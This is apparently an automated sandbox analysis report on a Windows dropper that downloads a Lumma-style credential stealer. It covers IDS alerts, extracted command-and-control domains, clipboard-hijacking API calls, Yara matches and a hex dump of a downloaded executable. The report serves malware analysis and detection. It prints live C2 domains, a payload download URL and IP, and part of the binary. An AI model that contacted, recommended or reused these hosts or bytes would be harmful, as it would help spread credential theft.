Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	4_2_00928A77
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then test eax, eax	4_2_00928A77
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D2CC012h]	4_2_00904BD2
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_008F5BF7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebp, eax	4_2_008F5BF7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00906B2A
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0091CCB0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_0091DCBC
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push ebx	4_2_0092CCFA
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	4_2_00907C28
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then xor edi, edi	4_2_00907C28
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov esi, eax	4_2_00905C41
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0091CD89
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00918DC8
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push esi	4_2_00917D1A
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0091CD37
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0091CD78
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], AF697AECh	4_2_00904E96
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp al, 2Eh	4_2_00916E96
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], E785F9BAh	4_2_00904E87
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_008FDE40
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_008FDE40
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	4_2_00918FA0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_00905FD3
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	4_2_0092EF07
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	4_2_00906F35
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	4_2_00906F35
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push 00000000h	4_2_00919F40

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.12:49712 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2058375 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI) : 192.168.2.12:49715 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.12:51216 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.12:49712 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.12:49712 -> 172.67.220.223:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: energyaffai.lat

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 18 Dec 2024 19:55:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 18 Dec 2024 19:45:02 GMTETag: "59e00-62990a64a108c"Accept-Ranges: bytesContent-Length: 368128Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 28 04 00 3c 00 00 00 00 10 42 00 f0 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc f3 03 00 00 10 00 00 00 f4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 21 00 00 00 10 04 00 00 22 00 00 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c c4 3d 00 00 40 04 00 00 70 00 00 00 1a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 12 01 00 00 10 42 00 00 14 01 00 00 8a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View	IP Address: 172.67.179.207 172.67.179.207
Source: Joe Sandbox View	IP Address: 176.113.115.19 176.113.115.19

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49712 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49715 -> 172.67.220.223:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49711 -> 176.113.115.19:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49710 -> 172.67.179.207:443

Source: global traffic

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: rapeflowwj.lat

Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19
Source: unknown	TCP traffic detected without corresponding DNS query: 176.113.115.19

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_004029F4

Source: global traffic	HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
Source: global traffic	HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19

Source: global traffic	DNS traffic detected: DNS query: post-to-me.com
Source: global traffic	DNS traffic detected: DNS query: rapeflowwj.lat

Source: unknown

Source: sqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/
Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
Source: sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
Source: sqJIHyPqhr.exe, 00000000.00000003.2513451673.0000000000A82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exey
Source: E093.tmp.exe, 00000004.00000003.2580762347.0000000000A51000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580522241.0000000000A43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: Amcache.hve.8.dr	String found in binary or memory: http://upx.sf.net
Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/
Source: sqJIHyPqhr.exe	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
Source: sqJIHyPqhr.exe, 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
Source: sqJIHyPqhr.exe, 00000000.00000002.4891698333.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEf6
Source: E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/
Source: E093.tmp.exe, 00000004.00000002.2679057343.00000000009E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/6
Source: E093.tmp.exe, 00000004.00000002.2679025621.00000000009C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/Y
Source: E093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/api
Source: E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/api1
Source: E093.tmp.exe, 00000004.00000003.2580784849.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/apiN
Source: E093.tmp.exe, 00000004.00000002.2679106229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580784849.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000003.2580939365.0000000000A05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/apip
Source: E093.tmp.exe, 00000004.00000003.2580522241.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, E093.tmp.exe, 00000004.00000002.2679041344.00000000009D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rapeflowwj.lat/apis

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.12:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.12:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,

0_2_004016DF

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_004016DF
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024A1942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,		0_2_024A1942

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

0_2_004016DF

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024A2361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,		0_2_024A2361
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024A2605 NtdllDefWindowProc_W,PostQuitMessage,		0_2_024A2605

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00428022	0_2_00428022
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004071AB	0_2_004071AB
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004373D9	0_2_004373D9
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0042D4EE	0_2_0042D4EE
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00427484	0_2_00427484
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00428560	0_2_00428560
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0043D678	0_2_0043D678
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004166AF	0_2_004166AF
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00413725	0_2_00413725
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004277F6	0_2_004277F6
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0040E974	0_2_0040E974
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_0042EAE0	0_2_0042EAE0
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00427AA0	0_2_00427AA0
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00418AAF	0_2_00418AAF
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00436CBF	0_2_00436CBF
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00427D67	0_2_00427D67
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_00413F0B	0_2_00413F0B
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C8289	0_2_024C8289
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024CED47	0_2_024CED47
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024B4172	0_2_024B4172
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C76EB	0_2_024C76EB
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024CD755	0_2_024CD755
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C87C7	0_2_024C87C7
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C7A5D	0_2_024C7A5D
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024AEBDB	0_2_024AEBDB
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024B6916	0_2_024B6916
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024B398C	0_2_024B398C
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024D6F26	0_2_024D6F26
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C7FCE	0_2_024C7FCE
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024CED47	0_2_024CED47
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024C7D07	0_2_024C7D07
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024B8D16	0_2_024B8D16
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00408850	4_2_00408850
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00423860	4_2_00423860
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00438810	4_2_00438810
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041682D	4_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004288CB	4_2_004288CB
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043D880	4_2_0043D880
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004218A0	4_2_004218A0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00430940	4_2_00430940
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00403970	4_2_00403970
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00420939	4_2_00420939
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004179C1	4_2_004179C1
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004231C2	4_2_004231C2
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004241C0	4_2_004241C0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043B1D0	4_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004291DD	4_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043D980	4_2_0043D980
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00405990	4_2_00405990
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00422190	4_2_00422190
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043D997	4_2_0043D997
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043D999	4_2_0043D999
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004091B0	4_2_004091B0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042CA49	4_2_0042CA49
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042DA53	4_2_0042DA53
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00416263	4_2_00416263
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0040EA10	4_2_0040EA10
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00415220	4_2_00415220
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042CAD0	4_2_0042CAD0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_004252DD	4_2_004252DD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041B2E0	4_2_0041B2E0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00406280	4_2_00406280
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043DA80	4_2_0043DA80
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041E290	4_2_0041E290
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0041CB40	4_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043D34D	4_2_0043D34D
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00426B50	4_2_00426B50
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0043DB60	4_2_0043DB60
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00436B08	4_2_00436B08
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042830D	4_2_0042830D
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042CB11	4_2_0042CB11
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00404320	4_2_00404320
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_0042CB22	4_2_0042CB22
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00425327	4_2_00425327
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4_2_00408330	4_2_00408330
